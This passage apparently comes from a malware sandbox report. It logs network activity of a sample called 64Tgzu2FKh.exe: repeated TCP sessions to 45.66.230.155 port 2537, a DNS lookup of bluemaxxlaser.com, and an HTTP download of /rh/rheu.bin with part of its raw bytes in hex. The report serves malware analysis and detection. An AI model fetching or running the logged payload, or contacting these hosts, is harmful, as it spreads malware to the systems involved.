Jun 1, 2023 22:36:42.094870090 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.094870090 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095050097 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095050097 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095350027 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095397949 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095473051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095525980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095537901 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095551014 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095571041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095583916 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095587969 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095602036 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095654964 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095674038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095685959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095698118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.095771074 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095771074 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095771074 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095771074 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.095963001 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.096343040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096407890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096496105 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096508980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096523046 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096543074 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096554995 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096569061 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096604109 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096616983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096637011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096649885 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096735954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.096736908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.096736908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.096736908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.096736908 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.096905947 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.097239971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097292900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097358942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097399950 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.097419977 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097433090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097451925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097465038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097476959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097518921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097585917 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.097585917 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.097585917 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.097614050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097673893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.097769022 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.097882032 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.098088980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098189116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098246098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098259926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098270893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098311901 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098354101 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.098354101 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.098373890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098387003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098400116 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098418951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098431110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098460913 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.098479033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098491907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.098510027 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.098510027 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.098666906 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099275112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099380016 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099415064 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099441051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099462032 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099509954 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099582911 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099595070 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099603891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099637985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099643946 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099662066 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099697113 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099716902 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099720955 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099736929 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099756956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099783897 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099919081 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.099950075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.099971056 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.100099087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.248183966 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.248354912 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.475996017 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.486216068 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:42.494155884 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:42.504267931 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:13.912307978 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:13.931122065 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:13.931531906 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:13.931658030 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:13.950321913 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:13.961251020 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:13.961334944 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:13.961724997 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:13.968152046 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:13.998418093 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:13.998856068 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.030870914 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.033277988 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.092869043 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.093205929 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.111879110 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.113353014 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.115782022 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.174556017 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.175231934 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.193521976 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.194802046 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.208916903 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.209271908 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.209326029 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.209326029 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.209381104 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.209835052 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.209836006 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.227536917 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.227597952 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.227864981 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.227885008 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.227921009 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.227960110 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.228492975 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.228529930 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.228532076 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.228545904 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.228555918 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.228964090 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.229012012 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.229062080 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.229232073 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.245976925 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.246047020 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.246277094 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.246305943 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.246462107 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.246464014 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.246474981 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.246646881 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.246819973 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.246834040 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.246985912 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.247184038 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.247205019 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.247354984 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.247422934 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.247422934 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.247592926 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265028000 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265075922 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265259981 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265274048 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265310049 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265327930 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265372992 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265387058 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265397072 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265407085 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265417099 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265427113 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265465975 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265753031 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265866995 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.265928984 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265964985 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.265964985 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.266165018 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:14.283724070 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.283786058 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.283828020 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.284672022 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.288258076 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:14.332813978 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:15.301367998 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:15.360680103 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:15.360811949 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:15.378948927 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:15.390125036 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:15.390249968 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:15.390371084 CEST	2537	49852	45.66.230.155	192.168.11.20
Jun 1, 2023 22:37:15.390389919 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:15.390441895 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:15.391464949 CEST	49852	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:37:15.408392906 CEST	2537	49852	45.66.230.155	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 1, 2023 22:35:35.163192034 CEST	53348	53	192.168.11.20	1.1.1.1
Jun 1, 2023 22:35:35.202748060 CEST	53	53348	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 1, 2023 22:35:35.163192034 CEST	192.168.11.20	1.1.1.1	0xdacb	Standard query (0)	bluemaxxlaser.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 1, 2023 22:35:35.202748060 CEST	1.1.1.1	192.168.11.20	0xdacb	No error (0)	bluemaxxlaser.com		203.175.174.69	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bluemaxxlaser.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49848	203.175.174.69	80	C:\Users\user\Desktop\64Tgzu2FKh.exe

Timestamp	kBytes transferred	Direction	Data
Jun 1, 2023 22:35:35.372864962 CEST	66	OUT	GET /rh/rheu.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Host: bluemaxxlaser.com
Jun 1, 2023 22:35:35.534806013 CEST	67	IN	HTTP/1.1 200 OK Date: Thu, 01 Jun 2023 20:35:35 GMT Server: Apache Last-Modified: Mon, 29 May 2023 06:42:21 GMT Accept-Ranges: bytes Content-Length: 454720 Content-Type: application/octet-stream Data Raw: bf c1 6a 50 fe 9f 0e 74 89 77 a7 4d 7f 8c ec 47 03 0c 77 50 e4 63 c0 32 3e f8 6d 89 10 06 09 f6 48 a1 2c 71 a5 00 38 08 23 83 b2 78 20 bd 8a 4c cc 6a a6 e4 26 13 6f 63 3f 6d 70 25 84 76 e1 a2 9e 10 37 c4 11 f2 ed 80 a8 a4 31 da c0 af bf 9d a6 05 0f 07 74 dd 95 52 ce 9d ea 6b 88 9c bd 42 18 94 49 80 07 45 4c 1c 14 71 cc fb d6 a9 df 79 6c 8b 9f 42 12 b5 54 72 66 d2 e8 5e 5b d5 74 3f 13 55 5e f1 ba c3 d6 98 8b 71 b4 6f 8c d6 b3 e6 25 05 a5 9d ad f6 91 77 e5 00 29 36 45 a2 b0 f7 9c 21 7c 87 20 12 b0 99 c8 2a 1b 46 62 df c9 a5 0c 21 37 05 fd 29 80 6f 8d 5b 08 4c 69 0f 39 a6 37 88 6d c7 0e cb 64 09 63 d4 f4 aa 48 68 8a 78 de 10 10 0a 4a 3b 6a 81 b0 72 10 26 71 5c 6e 6b 87 f9 4e 2b f7 58 a4 17 ae ea a3 79 4d 30 f2 0b 9a 73 92 fa 97 b4 5c fd b6 70 e9 10 65 ef b7 46 4c e9 2f 0b 60 47 13 dc 98 75 7a 01 8a a6 0d 58 b4 da 4a 81 50 ba 73 17 32 29 8a e5 aa ab 58 06 a8 bf 40 57 24 a0 12 1c 34 08 70 84 f1 0e b3 6d a8 bc 9a 1a a6 07 2a df 1b bb 30 28 12 f7 e2 37 84 f9 30 60 88 cf 96 f6 cb d0 b5 47 ff 22 57 1b 08 99 9a 27 85 e5 e1 d2 9a ff f8 35 bf c4 78 fe d6 3b 45 ef d9 bb 84 4e 26 80 89 47 05 bf 83 6e b8 24 8a 27 e1 35 30 ac a5 1f 0d 51 f5 38 a9 4e 84 16 13 80 5e 64 a0 7a 4e b6 d9 a7 d1 a5 e6 2c bd f5 16 4a 7c 7a 4f 8f f5 19 46 d0 2f b8 ac 4b ef fa 34 54 5f 89 8a 4c d5 69 fc 87 5b 5e df f6 70 dd 57 26 30 57 ae ec da 25 cb 38 60 1a 71 de 8e 31 47 16 bd 46 f3 84 bb 65 6c f7 98 22 ba e3 94 eb aa d4 44 31 f8 db e4 21 77 f0 74 85 a0 81 c6 5c c2 94 7f 26 19 ed 79 91 3f 5b 70 d7 19 81 a7 25 b7 fa 70 48 94 b9 a6 e8 7b 9d f5 9e 6e b5 7f 9d f1 2c 34 14 6f 1e 21 de aa 36 a3 4b 6a 3a 37 c1 1b 22 b0 6f fd a8 83 b3 25 6b 15 b5 01 4e 76 f4 de a6 2d 03 bb 80 96 6f ae 43 bf 9b 43 f0 a2 17 60 d6 01 3b d8 16 7c f7 4a 21 f5 e4 70 1a 8c a3 3e d5 34 77 36 b6 a7 f5 a6 01 f3 d1 33 da 72 56 87 fd 19 b2 5d 29 ca 6e 0f d6 50 93 c4 74 a4 e3 d3 23 7d eb db 6a b8 89 13 8a 58 7d a9 64 a7 e7 aa 40 aa 68 a3 f8 09 d2 62 a3 0d fe 13 02 f6 73 ed fd 75 ff cc c3 f8 1a 58 9d 99 cb 6a 4f 27 6d cf d3 0a 3f 04 39 cd a6 7e 47 19 8f d5 93 bc 96 3d 23 1b 6a c4 f9 e6 44 1a 0d 91 9d fc 79 1d fc c1 68 54 cb 50 b5 0b e9 a0 03 d0 bd 9a e8 a7 d2 ae 7a f3 a0 61 58 2a 38 88 79 0d 17 f8 b4 e4 87 c0 85 74 b8 0b d3 57 87 16 1e 45 0b 56 37 b9 dc 01 ff b1 18 c3 20 c2 cf 5b bf af 44 0c ed 90 78 65 88 01 57 38 4a 3c ae b4 e8 81 c7 a4 97 bd 87 e4 b9 9a 4d ed 96 b4 f6 94 d7 9e 48 36 cc 1d b1 1f b3 5d 5a fd f1 b9 f1 37 0a 31 ea c0 e5 14 91 cf 17 f8 45 df 99 a4 e2 3d ef 49 4b d0 c7 42 e6 b5 5b c0 05 d0 cd 74 bc 9c fe ca a9 d3 53 09 bd 5a 73 b9 58 59 ef 83 a8 73 6d 44 a3 2e b7 71 84 f3 2f 05 a4 a4 80 51 ab fb f9 a8 8d aa 76 b7 40 06 f0 8c 01 e5 fa 3f a5 dd e8 96 d1 05 ac 54 01 60 ff da 19 56 35 b2 9b 19 05 0c 16 a6 a1 50 26 46 a3 dc 91 19 46 d2 cc 33 96 41 1c 16 0f 65 d4 2f c6 6f a2 3f 09 3a 27 84 0d 88 47 43 ca 24 b7 e0 cd 41 6e ae e3 3b bf cf 48 b1 32 19 14 11 8d 4c 43 03 3f 6a f1 29 fe fc 41 d7 c5 37 35 1b a9 44 e2 bc 61 e5 46 7c 80 16 50 ba eb 31 e1 73 96 9b 9f ad 93 a2 bc b7 e4 51 ff 58 be 5e a4 35 4a 11 92 27 c6 34 cd 07 0d 2f a6 03 66 a0 ac cf ef 9f 0d cc ef 10 da 6d 95 d9 20 10 c8 e5 da d8 4b b3 e1 b5 88 6b ed e7 2d 90 e9 3c 1f a7 a9 b9 fc 99 33 9f 94 1d 52 31 c1 f2 48 3d 83 a1 08 37 02 25 c1 ef 32 9a cd b2 3f dc 01 be a2 9c 31 52 0a d7 25 b9 d3 ba 7a f0 48 Data Ascii: jPtwMGwPc2>mH,q8#x Lj&oc?mp%v71tRkBIELqylBTrf^[t?U^qo%w)6E!\| Fb!7)o[Li97mdcHhxJ;jr&q\nkN+XyM0s\peFL/`GuzXJPs2)X@W$4pm0(70`G"W'5x;EN&Gn$'50Q8N^dzN,J\|zOF/K4T_Li[^pW&0W%8`q1GFel"D1!wt\&y?[p%pH{n,4o!6Kj:7"o%kNv-oCC`;\|J!p>4w63rV])nPt#}jX}d@hbsuXjO'm?9~G=#jDyhTPzaX*8ytWEV7 [DxeW8J<MH6]Z71E=IKB[tSZsXYsmD.q/Qv@?T`V5P&FF3Ae/o?:'GC$An;H2LC?j)A75DaF\|P1sQX^5J'4/fm Kk-<3R1H=7%2?1R%zH
Jun 1, 2023 22:35:35.534929991 CEST	69	IN	Data Raw: 2d 49 c2 7a 2b 00 49 4c f9 91 73 1d 57 46 cf 01 c0 0f 15 84 42 67 24 9c 6d ea 92 bc 54 ae a2 6b 78 17 c5 ac 57 48 70 7b e4 6e ed 28 2e b1 02 97 45 96 15 37 85 6f d0 a4 62 3c 35 af 15 b1 c4 41 94 a3 c8 37 1c 5c ea 42 ac 44 8c 25 32 8b f8 e0 54 e7 Data Ascii: -Iz+ILsWFBg$mTkxWHp{n(.E7ob<5A7\BD%2TB_l&}j2&/p%gOKgs2OQ5NG3;22P7]I[Vc+[C;+,0E6L)%0fI%Og/iHhoR
Jun 1, 2023 22:35:35.534944057 CEST	70	IN	Data Raw: 1a 71 de 8e 31 47 16 bd 46 f3 84 bb 85 6a f7 40 2a ba e3 94 eb aa d4 44 31 f8 db e4 21 77 f0 74 85 a0 81 c6 5c c2 94 7f 26 19 ed 79 91 3f 5b 70 d7 19 81 a7 25 b7 fa 70 48 94 b9 a6 e8 7b 9d f5 9e 6e b5 7f 2d f0 2c 4c 17 6f 1e 21 de aa 36 a3 4b 6a Data Ascii: q1GFj@*D1!wt\&y?[p%pH{n-,Lo!6Kj:7"o%kNXYCCa+\|J!p>w6`3X\)~P#t#}j}$4hb>cu?XjO'mJ?+vp=#dMy
Jun 1, 2023 22:35:35.534955025 CEST	71	IN	Data Raw: a3 8f 58 d8 cd c4 c7 3f 4b 12 e7 2e 30 7d cc cb 72 b5 ce cf 36 cf 33 89 93 b0 3d b0 4a d3 39 68 e1 41 95 38 c8 29 11 c4 b7 f4 d5 3d 8e 59 38 97 a7 9d 93 36 d0 5e 15 e6 1f 21 08 9c 96 d1 21 29 f7 35 37 00 68 85 f8 68 f4 0a c0 56 31 b9 c1 73 e2 32 Data Ascii: X?K.0}r63=J9hA8)=Y86^!!)57hhV1s25?`ZgV">;Eizs:`8sg+Y!SBi\|&m-\|&+`;f,G}wxd2$N%&P%Yhl:s\21#x u
Jun 1, 2023 22:35:35.534966946 CEST	73	IN	Data Raw: 91 3a 21 ea 49 84 52 9c c9 12 d8 17 12 fa b9 7d 6f 5e de 69 f3 e7 93 af ae 1f 8f 0e ec 86 9f 18 2f b1 81 53 49 7d d1 64 7a 19 c0 5b 14 30 dd d2 0c b1 c4 c2 50 af 4d f7 13 d9 c3 bd 53 bb 07 63 3a 0e 38 69 11 ef 4d 2d 8d a0 fa 67 c5 93 50 f6 4d 84 Data Ascii: :!IR}o^i/SI}dz[0PMSc:8iM-gPMz& cuKgjMK!_$m<X8~N0sLY)uAr[ u0AM_l)%,j]W#L<WV,H?Yg{{+.
Jun 1, 2023 22:35:35.535073042 CEST	74	IN	Data Raw: f3 72 08 93 a7 34 3f 94 eb aa ef 4d 45 c8 50 62 c1 77 f0 74 6e ab 0a 93 a4 fb c4 77 52 10 66 39 95 04 9a 05 26 f2 96 2c 6d b3 71 60 c1 85 32 ae 63 2b 99 a5 f4 6e 3c 2e 29 0f 5a 54 e8 bc 76 5c 0a c7 7d 2e cd ca 3a 37 c1 71 22 e0 87 d7 b5 83 b3 a6 Data Ascii: r4?MEPbwtnwRf9&,mq`2c+n<.)ZTv\}.:7q"0:SZ28C<I(9m6J6^vxG9v"l,)Ew5,6Yj3qule{Fs8uHSZut;A*O+K?rmfe1mTL'?84u
